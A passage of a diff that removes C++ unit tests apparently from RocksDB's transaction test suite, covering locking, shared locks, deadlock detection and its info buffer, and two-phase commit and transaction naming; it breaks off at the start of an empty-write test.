-
-  TransactionDBOptions txn_db_options;
-
-  TransactionTest() {
-    options.create_if_missing = true;
-    options.max_write_buffer_number = 2;
-    options.write_buffer_size = 4 * 1024;
-    options.level0_file_num_compaction_trigger = 2;
-    options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-    env = new FaultInjectionTestEnv(Env::Default());
-    options.env = env;
-    options.concurrent_prepare = std::get<1>(GetParam());
-    dbname = test::TmpDir() + "/transaction_testdb";
-
-    DestroyDB(dbname, options);
-    txn_db_options.transaction_lock_timeout = 0;
-    txn_db_options.default_lock_timeout = 0;
-    txn_db_options.write_policy = std::get<2>(GetParam());
-    Status s;
-    if (std::get<0>(GetParam()) == false) {
-      s = TransactionDB::Open(options, txn_db_options, dbname, &db);
-    } else {
-      s = OpenWithStackableDB();
-    }
-    assert(s.ok());
-  }
-
-  ~TransactionTest() {
-    delete db;
-    DestroyDB(dbname, options);
-    delete env;
-  }
-
-  Status ReOpenNoDelete() {
-    delete db;
-    db = nullptr;
-    env->AssertNoOpenFile();
-    env->DropUnsyncedFileData();
-    env->ResetState();
-    Status s;
-    if (std::get<0>(GetParam()) == false) {
-      s = TransactionDB::Open(options, txn_db_options, dbname, &db);
-    } else {
-      s = OpenWithStackableDB();
-    }
-    return s;
-  }
-
-  Status ReOpen() {
-    delete db;
-    DestroyDB(dbname, options);
-    Status s;
-    if (std::get<0>(GetParam()) == false) {
-      s = TransactionDB::Open(options, txn_db_options, dbname, &db);
-    } else {
-      s = OpenWithStackableDB();
-    }
-    return s;
-  }
-
-  Status OpenWithStackableDB() {
-    std::vector<size_t> compaction_enabled_cf_indices;
-    std::vector<ColumnFamilyDescriptor> column_families{ColumnFamilyDescriptor(
-        kDefaultColumnFamilyName, ColumnFamilyOptions(options))};
-
-    TransactionDB::PrepareWrap(&options, &column_families,
-                               &compaction_enabled_cf_indices);
-    std::vector<ColumnFamilyHandle*> handles;
-    DB* root_db;
-    Options options_copy(options);
-    Status s =
-        DB::Open(options_copy, dbname, column_families, &handles, &root_db);
-    if (s.ok()) {
-      assert(handles.size() == 1);
-      s = TransactionDB::WrapStackableDB(
-          new StackableDB(root_db), txn_db_options,
-          compaction_enabled_cf_indices, handles, &db);
-      delete handles[0];
-    }
-    return s;
-  }
-};
-
-class MySQLStyleTransactionTest : public TransactionTest {};
-class WritePreparedTransactionTest : public TransactionTest {};
-
-static const TxnDBWritePolicy wc = WRITE_COMMITTED;
-static const TxnDBWritePolicy wp = WRITE_PREPARED;
-// TODO(myabandeh): Instantiate the tests with other write policies
-INSTANTIATE_TEST_CASE_P(DBAsBaseDB, TransactionTest,
-                        ::testing::Values(std::make_tuple(false, false, wc)));
-INSTANTIATE_TEST_CASE_P(StackableDBAsBaseDB, TransactionTest,
-                        ::testing::Values(std::make_tuple(true, false, wc)));
-INSTANTIATE_TEST_CASE_P(MySQLStyleTransactionTest, MySQLStyleTransactionTest,
-                        ::testing::Values(std::make_tuple(false, false, wc),
-                                          std::make_tuple(false, true, wc),
-                                          std::make_tuple(true, false, wc),
-                                          std::make_tuple(true, true, wc)));
-INSTANTIATE_TEST_CASE_P(WritePreparedTransactionTest,
-                        WritePreparedTransactionTest,
-                        ::testing::Values(std::make_tuple(false, true, wp)));
-
-TEST_P(TransactionTest, DoubleEmptyWrite) {
-  WriteOptions write_options;
-  write_options.sync = true;
-  write_options.disableWAL = false;
-
-  WriteBatch batch;
-
-  ASSERT_OK(db->Write(write_options, &batch));
-  ASSERT_OK(db->Write(write_options, &batch));
-}
-
-TEST_P(TransactionTest, SuccessTest) {
-  ASSERT_OK(db->ResetStats());
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, Slice("foo"), Slice("bar"));
-  db->Put(write_options, Slice("foo2"), Slice("bar"));
-
-  Transaction* txn = db->BeginTransaction(write_options, TransactionOptions());
-  ASSERT_TRUE(txn);
-
-  ASSERT_EQ(0, txn->GetNumPuts());
-  ASSERT_LE(0, txn->GetID());
-
-  s = txn->GetForUpdate(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar");
-
-  s = txn->Put(Slice("foo"), Slice("bar2"));
-  ASSERT_OK(s);
-
-  ASSERT_EQ(1, txn->GetNumPuts());
-
-  s = txn->GetForUpdate(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, WaitingTxn) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  txn_options.lock_timeout = 1;
-  s = db->Put(write_options, Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-
-  /* create second cf */
-  ColumnFamilyHandle* cfa;
-  ColumnFamilyOptions cf_options;
-  s = db->CreateColumnFamily(cf_options, "CFA", &cfa);
-  ASSERT_OK(s);
-  s = db->Put(write_options, cfa, Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  TransactionID id1 = txn1->GetID();
-  ASSERT_TRUE(txn1);
-  ASSERT_TRUE(txn2);
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", [&](void* arg) {
-        std::string key;
-        uint32_t cf_id;
-        std::vector<TransactionID> wait = txn2->GetWaitingTxns(&cf_id, &key);
-        ASSERT_EQ(key, "foo");
-        ASSERT_EQ(wait.size(), 1);
-        ASSERT_EQ(wait[0], id1);
-        ASSERT_EQ(cf_id, 0);
-      });
-
-  // lock key in default cf
-  s = txn1->GetForUpdate(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar");
-
-  // lock key in cfa
-  s = txn1->GetForUpdate(read_options, cfa, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar");
-
-  auto lock_data = db->GetLockStatusData();
-  // Locked keys exist in both column family.
-  ASSERT_EQ(lock_data.size(), 2);
-
-  auto cf_iterator = lock_data.begin();
-
-  // The iterator points to an unordered_multimap
-  // thus the test can not assume any particular order.
-
-  // Column family is 1 or 0 (cfa).
-  if (cf_iterator->first != 1 && cf_iterator->first != 0) {
-    FAIL();
-  }
-  // The locked key is "foo" and is locked by txn1
-  ASSERT_EQ(cf_iterator->second.key, "foo");
-  ASSERT_EQ(cf_iterator->second.ids.size(), 1);
-  ASSERT_EQ(cf_iterator->second.ids[0], txn1->GetID());
-
-  cf_iterator++;
-
-  // Column family is 0 (default) or 1.
-  if (cf_iterator->first != 1 && cf_iterator->first != 0) {
-    FAIL();
-  }
-  // The locked key is "foo" and is locked by txn1
-  ASSERT_EQ(cf_iterator->second.key, "foo");
-  ASSERT_EQ(cf_iterator->second.ids.size(), 1);
-  ASSERT_EQ(cf_iterator->second.ids[0], txn1->GetID());
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  s = txn2->GetForUpdate(read_options, "foo", &value);
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  delete cfa;
-  delete txn1;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, SharedLocks) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  Status s;
-
-  txn_options.lock_timeout = 1;
-  s = db->Put(write_options, Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  Transaction* txn3 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn1);
-  ASSERT_TRUE(txn2);
-  ASSERT_TRUE(txn3);
-
-  // Test shared access between txns
-  s = txn1->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn3->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  auto lock_data = db->GetLockStatusData();
-  ASSERT_EQ(lock_data.size(), 1);
-
-  auto cf_iterator = lock_data.begin();
-  ASSERT_EQ(cf_iterator->second.key, "foo");
-
-  // We compare whether the set of txns locking this key is the same. To do
-  // this, we need to sort both vectors so that the comparison is done
-  // correctly.
-  std::vector<TransactionID> expected_txns = {txn1->GetID(), txn2->GetID(),
-                                              txn3->GetID()};
-  std::vector<TransactionID> lock_txns = cf_iterator->second.ids;
-  ASSERT_EQ(expected_txns, lock_txns);
-  ASSERT_FALSE(cf_iterator->second.exclusive);
-
-  txn1->Rollback();
-  txn2->Rollback();
-  txn3->Rollback();
-
-  // Test txn1 and txn2 sharing a lock and txn3 trying to obtain it.
-  s = txn1->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn3->GetForUpdate(read_options, "foo", nullptr);
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  txn1->UndoGetForUpdate("foo");
-  s = txn3->GetForUpdate(read_options, "foo", nullptr);
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  txn2->UndoGetForUpdate("foo");
-  s = txn3->GetForUpdate(read_options, "foo", nullptr);
-  ASSERT_OK(s);
-
-  txn1->Rollback();
-  txn2->Rollback();
-  txn3->Rollback();
-
-  // Test txn1 and txn2 sharing a lock and txn2 trying to upgrade lock.
-  s = txn1->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options, "foo", nullptr);
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  txn1->UndoGetForUpdate("foo");
-  s = txn2->GetForUpdate(read_options, "foo", nullptr);
-  ASSERT_OK(s);
-
-  txn1->Rollback();
-  txn2->Rollback();
-
-  // Test txn1 trying to downgrade its lock.
-  s = txn1->GetForUpdate(read_options, "foo", nullptr, true /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  // Should still fail after "downgrading".
-  s = txn1->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  txn1->Rollback();
-  txn2->Rollback();
-
-  // Test txn1 holding an exclusive lock and txn2 trying to obtain shared
-  // access.
-  s = txn1->GetForUpdate(read_options, "foo", nullptr);
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  txn1->UndoGetForUpdate("foo");
-  s = txn2->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  delete txn1;
-  delete txn2;
-  delete txn3;
-}
-
-TEST_P(TransactionTest, DeadlockCycleShared) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-
-  txn_options.lock_timeout = 1000000;
-  txn_options.deadlock_detect = true;
-
-  // Set up a wait for chain like this:
-  //
-  // Tn -> T(n*2)
-  // Tn -> T(n*2 + 1)
-  //
-  // So we have:
-  // T1 -> T2 -> T4 ...
-  //    |     |> T5 ...
-  //    |> T3 -> T6 ...
-  //          |> T7 ...
-  // up to T31, then T[16 - 31] -> T1.
-  // Note that Tn holds lock on floor(n / 2).
-
-  std::vector<Transaction*> txns(31);
-
-  for (uint32_t i = 0; i < 31; i++) {
-    txns[i] = db->BeginTransaction(write_options, txn_options);
-    ASSERT_TRUE(txns[i]);
-    auto s = txns[i]->GetForUpdate(read_options, ToString((i + 1) / 2), nullptr,
-                                   false /* exclusive */);
-    ASSERT_OK(s);
-  }
-
-  std::atomic<uint32_t> checkpoints(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "TransactionLockMgr::AcquireWithTimeout:WaitingTxn",
-      [&](void* arg) { checkpoints.fetch_add(1); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // We want the leaf transactions to block and hold everyone back.
-  std::vector<port::Thread> threads;
-  for (uint32_t i = 0; i < 15; i++) {
-    std::function<void()> blocking_thread = [&, i] {
-      auto s = txns[i]->GetForUpdate(read_options, ToString(i + 1), nullptr,
-                                     true /* exclusive */);
-      ASSERT_OK(s);
-      txns[i]->Rollback();
-      delete txns[i];
-    };
-    threads.emplace_back(blocking_thread);
-  }
-
-  // Wait until all threads are waiting on each other.
-  while (checkpoints.load() != 15) {
-    /* sleep override */
-    std::this_thread::sleep_for(std::chrono::milliseconds(100));
-  }
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  // Complete the cycle T[16 - 31] -> T1
-  for (uint32_t i = 15; i < 31; i++) {
-    auto s =
-        txns[i]->GetForUpdate(read_options, "0", nullptr, true /* exclusive */);
-    ASSERT_TRUE(s.IsDeadlock());
-
-    // Calculate next buffer len, plateau at 5 when 5 records are inserted.
-    const uint32_t curr_dlock_buffer_len_ =
-        (i - 14 > kInitialMaxDeadlocks) ? kInitialMaxDeadlocks : (i - 14);
-
-    auto dlock_buffer = db->GetDeadlockInfoBuffer();
-    ASSERT_EQ(dlock_buffer.size(), curr_dlock_buffer_len_);
-    auto dlock_entry = dlock_buffer[0].path;
-    ASSERT_EQ(dlock_entry.size(), kInitialMaxDeadlocks);
-
-    int64_t curr_waiting_key = 0;
-
-    // Offset of each txn id from the root of the shared dlock tree's txn id.
-    int64_t offset_root = dlock_entry[0].m_txn_id - 1;
-    // Offset of the final entry in the dlock path from the root's txn id.
-    TransactionID leaf_id =
-        dlock_entry[dlock_entry.size() - 1].m_txn_id - offset_root;
-
-    for (auto it = dlock_entry.rbegin(); it != dlock_entry.rend(); it++) {
-      auto dl_node = *it;
-      ASSERT_EQ(dl_node.m_txn_id, offset_root + leaf_id);
-      ASSERT_EQ(dl_node.m_cf_id, 0);
-      ASSERT_EQ(dl_node.m_waiting_key, ToString(curr_waiting_key));
-      ASSERT_EQ(dl_node.m_exclusive, true);
-
-      if (curr_waiting_key == 0) {
-        curr_waiting_key = leaf_id;
-      }
-      curr_waiting_key /= 2;
-      leaf_id /= 2;
-    }
-  }
-
-  // Rollback the leaf transaction.
-  for (uint32_t i = 15; i < 31; i++) {
-    txns[i]->Rollback();
-    delete txns[i];
-  }
-
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  // Downsize the buffer and verify the 3 latest deadlocks are preserved.
-  auto dlock_buffer_before_resize = db->GetDeadlockInfoBuffer();
-  db->SetDeadlockInfoBufferSize(3);
-  auto dlock_buffer_after_resize = db->GetDeadlockInfoBuffer();
-  ASSERT_EQ(dlock_buffer_after_resize.size(), 3);
-
-  for (uint32_t i = 0; i < dlock_buffer_after_resize.size(); i++) {
-    for (uint32_t j = 0; j < dlock_buffer_after_resize[i].path.size(); j++) {
-      ASSERT_EQ(dlock_buffer_after_resize[i].path[j].m_txn_id,
-                dlock_buffer_before_resize[i].path[j].m_txn_id);
-    }
-  }
-
-  // Upsize the buffer and verify the 3 latest dealocks are preserved.
-  dlock_buffer_before_resize = db->GetDeadlockInfoBuffer();
-  db->SetDeadlockInfoBufferSize(5);
-  dlock_buffer_after_resize = db->GetDeadlockInfoBuffer();
-  ASSERT_EQ(dlock_buffer_after_resize.size(), 3);
-
-  for (uint32_t i = 0; i < dlock_buffer_before_resize.size(); i++) {
-    for (uint32_t j = 0; j < dlock_buffer_before_resize[i].path.size(); j++) {
-      ASSERT_EQ(dlock_buffer_after_resize[i].path[j].m_txn_id,
-                dlock_buffer_before_resize[i].path[j].m_txn_id);
-    }
-  }
-
-  // Downsize to 0 and verify the size is consistent.
-  dlock_buffer_before_resize = db->GetDeadlockInfoBuffer();
-  db->SetDeadlockInfoBufferSize(0);
-  dlock_buffer_after_resize = db->GetDeadlockInfoBuffer();
-  ASSERT_EQ(dlock_buffer_after_resize.size(), 0);
-
-  // Upsize from 0 to verify the size is persistent.
-  dlock_buffer_before_resize = db->GetDeadlockInfoBuffer();
-  db->SetDeadlockInfoBufferSize(3);
-  dlock_buffer_after_resize = db->GetDeadlockInfoBuffer();
-  ASSERT_EQ(dlock_buffer_after_resize.size(), 0);
-
-  // Contrived case of shared lock of cycle size 2 to verify that a shared
-  // lock causing a deadlock is correctly reported as "shared" in the buffer.
-  std::vector<Transaction*> txns_shared(2);
-
-  // Create a cycle of size 2.
-  for (uint32_t i = 0; i < 2; i++) {
-    txns_shared[i] = db->BeginTransaction(write_options, txn_options);
-    ASSERT_TRUE(txns_shared[i]);
-    auto s = txns_shared[i]->GetForUpdate(read_options, ToString(i), nullptr);
-    ASSERT_OK(s);
-  }
-
-  std::atomic<uint32_t> checkpoints_shared(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "TransactionLockMgr::AcquireWithTimeout:WaitingTxn",
-      [&](void* arg) { checkpoints_shared.fetch_add(1); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  std::vector<port::Thread> threads_shared;
-  for (uint32_t i = 0; i < 1; i++) {
-    std::function<void()> blocking_thread = [&, i] {
-      auto s =
-          txns_shared[i]->GetForUpdate(read_options, ToString(i + 1), nullptr);
-      ASSERT_OK(s);
-      txns_shared[i]->Rollback();
-      delete txns_shared[i];
-    };
-    threads_shared.emplace_back(blocking_thread);
-  }
-
-  // Wait until all threads are waiting on each other.
-  while (checkpoints_shared.load() != 1) {
-    /* sleep override */
-    std::this_thread::sleep_for(std::chrono::milliseconds(100));
-  }
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  // Complete the cycle T2 -> T1 with a shared lock.
-  auto s = txns_shared[1]->GetForUpdate(read_options, "0", nullptr, false);
-  ASSERT_TRUE(s.IsDeadlock());
-
-  auto dlock_buffer = db->GetDeadlockInfoBuffer();
-
-  // Verify the size of the buffer and the single path.
-  ASSERT_EQ(dlock_buffer.size(), 1);
-  ASSERT_EQ(dlock_buffer[0].path.size(), 2);
-
-  // Verify the exclusivity field of the transactions in the deadlock path.
-  ASSERT_TRUE(dlock_buffer[0].path[0].m_exclusive);
-  ASSERT_FALSE(dlock_buffer[0].path[1].m_exclusive);
-  txns_shared[1]->Rollback();
-  delete txns_shared[1];
-
-  for (auto& t : threads_shared) {
-    t.join();
-  }
-}
-
-TEST_P(TransactionTest, DeadlockCycle) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-
-  // offset by 2 from the max depth to test edge case
-  const uint32_t kMaxCycleLength = 52;
-
-  txn_options.lock_timeout = 1000000;
-  txn_options.deadlock_detect = true;
-
-  for (uint32_t len = 2; len < kMaxCycleLength; len++) {
-    // Set up a long wait for chain like this:
-    //
-    // T1 -> T2 -> T3 -> ... -> Tlen
-
-    std::vector<Transaction*> txns(len);
-
-    for (uint32_t i = 0; i < len; i++) {
-      txns[i] = db->BeginTransaction(write_options, txn_options);
-      ASSERT_TRUE(txns[i]);
-      auto s = txns[i]->GetForUpdate(read_options, ToString(i), nullptr);
-      ASSERT_OK(s);
-    }
-
-    std::atomic<uint32_t> checkpoints(0);
-    rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "TransactionLockMgr::AcquireWithTimeout:WaitingTxn",
-        [&](void* arg) { checkpoints.fetch_add(1); });
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-    // We want the last transaction in the chain to block and hold everyone
-    // back.
-    std::vector<port::Thread> threads;
-    for (uint32_t i = 0; i < len - 1; i++) {
-      std::function<void()> blocking_thread = [&, i] {
-        auto s = txns[i]->GetForUpdate(read_options, ToString(i + 1), nullptr);
-        ASSERT_OK(s);
-        txns[i]->Rollback();
-        delete txns[i];
-      };
-      threads.emplace_back(blocking_thread);
-    }
-
-    // Wait until all threads are waiting on each other.
-    while (checkpoints.load() != len - 1) {
-      /* sleep override */
-      std::this_thread::sleep_for(std::chrono::milliseconds(100));
-    }
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-    rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-    // Complete the cycle Tlen -> T1
-    auto s = txns[len - 1]->GetForUpdate(read_options, "0", nullptr);
-    ASSERT_TRUE(s.IsDeadlock());
-
-    const uint32_t dlock_buffer_size_ = (len - 1 > 5) ? 5 : (len - 1);
-    uint32_t curr_waiting_key = 0;
-    TransactionID curr_txn_id = txns[0]->GetID();
-
-    auto dlock_buffer = db->GetDeadlockInfoBuffer();
-    ASSERT_EQ(dlock_buffer.size(), dlock_buffer_size_);
-    uint32_t check_len = len;
-    bool check_limit_flag = false;
-
-    // Special case for a deadlock path that exceeds the maximum depth.
-    if (len > 50) {
-      check_len = 0;
-      check_limit_flag = true;
-    }
-    auto dlock_entry = dlock_buffer[0].path;
-    ASSERT_EQ(dlock_entry.size(), check_len);
-    ASSERT_EQ(dlock_buffer[0].limit_exceeded, check_limit_flag);
-
-    // Iterates backwards over path verifying decreasing txn_ids.
-    for (auto it = dlock_entry.rbegin(); it != dlock_entry.rend(); it++) {
-      auto dl_node = *it;
-      ASSERT_EQ(dl_node.m_txn_id, len + curr_txn_id - 1);
-      ASSERT_EQ(dl_node.m_cf_id, 0);
-      ASSERT_EQ(dl_node.m_waiting_key, ToString(curr_waiting_key));
-      ASSERT_EQ(dl_node.m_exclusive, true);
-
-      curr_txn_id--;
-      if (curr_waiting_key == 0) {
-        curr_waiting_key = len;
-      }
-      curr_waiting_key--;
-    }
-
-    // Rollback the last transaction.
-    txns[len - 1]->Rollback();
-    delete txns[len - 1];
-
-    for (auto& t : threads) {
-      t.join();
-    }
-  }
-}
-
-TEST_P(TransactionTest, DeadlockStress) {
-  const uint32_t NUM_TXN_THREADS = 10;
-  const uint32_t NUM_KEYS = 100;
-  const uint32_t NUM_ITERS = 10000;
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-
-  txn_options.lock_timeout = 1000000;
-  txn_options.deadlock_detect = true;
-  std::vector<std::string> keys;
-
-  for (uint32_t i = 0; i < NUM_KEYS; i++) {
-    db->Put(write_options, Slice(ToString(i)), Slice(""));
-    keys.push_back(ToString(i));
-  }
-
-  size_t tid = std::hash<std::thread::id>()(std::this_thread::get_id());
-  Random rnd(static_cast<uint32_t>(tid));
-  std::function<void(uint32_t)> stress_thread = [&](uint32_t seed) {
-    std::default_random_engine g(seed);
-
-    Transaction* txn;
-    for (uint32_t i = 0; i < NUM_ITERS; i++) {
-      txn = db->BeginTransaction(write_options, txn_options);
-      auto random_keys = keys;
-      std::shuffle(random_keys.begin(), random_keys.end(), g);
-
-      // Lock keys in random order.
-      for (const auto& k : random_keys) {
-        // Lock mostly for shared access, but exclusive 1/4 of the time.
-        auto s =
-            txn->GetForUpdate(read_options, k, nullptr, txn->GetID() % 4 == 0);
-        if (!s.ok()) {
-          ASSERT_TRUE(s.IsDeadlock());
-          txn->Rollback();
-          break;
-        }
-      }
-
-      delete txn;
-    }
-  };
-
-  std::vector<port::Thread> threads;
-  for (uint32_t i = 0; i < NUM_TXN_THREADS; i++) {
-    threads.emplace_back(stress_thread, rnd.Next());
-  }
-
-  for (auto& t : threads) {
-    t.join();
-  }
-}
-
-TEST_P(TransactionTest, CommitTimeBatchFailTest) {
-  WriteOptions write_options;
-  TransactionOptions txn_options;
-
-  string value;
-  Status s;
-
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn1);
-
-  txn1->GetCommitTimeWriteBatch()->Put("cat", "dog");
-
-  s = txn1->Put("foo", "bar");
-  ASSERT_OK(s);
-
-  // fails due to non-empty commit-time batch
-  s = txn1->Commit();
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  delete txn1;
-}
-
-TEST_P(TransactionTest, SimpleTwoPhaseTransactionTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-
-  TransactionOptions txn_options;
-
-  string value;
-  Status s;
-
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("xid");
-  ASSERT_OK(s);
-
-  ASSERT_EQ(db->GetTransactionByName("xid"), txn);
-
-  // transaction put
-  s = txn->Put(Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-  ASSERT_EQ(1, txn->GetNumPuts());
-
-  // regular db put
-  s = db->Put(write_options, Slice("foo2"), Slice("bar2"));
-  ASSERT_OK(s);
-  ASSERT_EQ(1, txn->GetNumPuts());
-
-  // regular db read
-  db->Get(read_options, "foo2", &value);
-  ASSERT_EQ(value, "bar2");
-
-  // commit time put
-  txn->GetCommitTimeWriteBatch()->Put(Slice("gtid"), Slice("dogs"));
-  txn->GetCommitTimeWriteBatch()->Put(Slice("gtid2"), Slice("cats"));
-
-  // nothing has been prepped yet
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(), 0);
-
-  s = txn->Prepare();
-  ASSERT_OK(s);
-
-  // data not im mem yet
-  s = db->Get(read_options, Slice("foo"), &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = db->Get(read_options, Slice("gtid"), &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  // find trans in list of prepared transactions
-  std::vector<Transaction*> prepared_trans;
-  db->GetAllPreparedTransactions(&prepared_trans);
-  ASSERT_EQ(prepared_trans.size(), 1);
-  ASSERT_EQ(prepared_trans.front()->GetName(), "xid");
-
-  auto log_containing_prep =
-      db_impl->TEST_FindMinLogContainingOutstandingPrep();
-  ASSERT_GT(log_containing_prep, 0);
-
-  // make commit
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  // value is now available
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar");
-
-  s = db->Get(read_options, "gtid", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "dogs");
-
-  s = db->Get(read_options, "gtid2", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "cats");
-
-  // we already committed
-  s = txn->Commit();
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // no longer is prpared results
-  db->GetAllPreparedTransactions(&prepared_trans);
-  ASSERT_EQ(prepared_trans.size(), 0);
-  ASSERT_EQ(db->GetTransactionByName("xid"), nullptr);
-
-  // heap should not care about prepared section anymore
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(), 0);
-
-  // but now our memtable should be referencing the prep section
-  ASSERT_EQ(log_containing_prep,
-            db_impl->TEST_FindMinPrepLogReferencedByMemTable());
-
-  db_impl->TEST_FlushMemTable(true);
-
-  // after memtable flush we can now relese the log
-  ASSERT_EQ(0, db_impl->TEST_FindMinPrepLogReferencedByMemTable());
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, TwoPhaseNameTest) {
-  Status s;
-
-  WriteOptions write_options;
-  TransactionOptions txn_options;
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  Transaction* txn3 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn3);
-  delete txn3;
-
-  // cant prepare txn without name
-  s = txn1->Prepare();
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // name too short
-  s = txn1->SetName("");
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // name too long
-  s = txn1->SetName(std::string(513, 'x'));
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // valid set name
-  s = txn1->SetName("name1");
-  ASSERT_OK(s);
-
-  // cant have duplicate name
-  s = txn2->SetName("name1");
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // shouldn't be able to prepare
-  s = txn2->Prepare();
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // valid name set
-  s = txn2->SetName("name2");
-  ASSERT_OK(s);
-
-  // cant reset name
-  s = txn2->SetName("name3");
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  ASSERT_EQ(txn1->GetName(), "name1");
-  ASSERT_EQ(txn2->GetName(), "name2");
-
-  s = txn1->Prepare();
-  ASSERT_OK(s);
-
-  // can't rename after prepare
-  s = txn1->SetName("name4");
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  delete txn1;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, TwoPhaseEmptyWriteTest) {
-  Status s;
-  std::string value;
-
-  WriteOptions write_options;
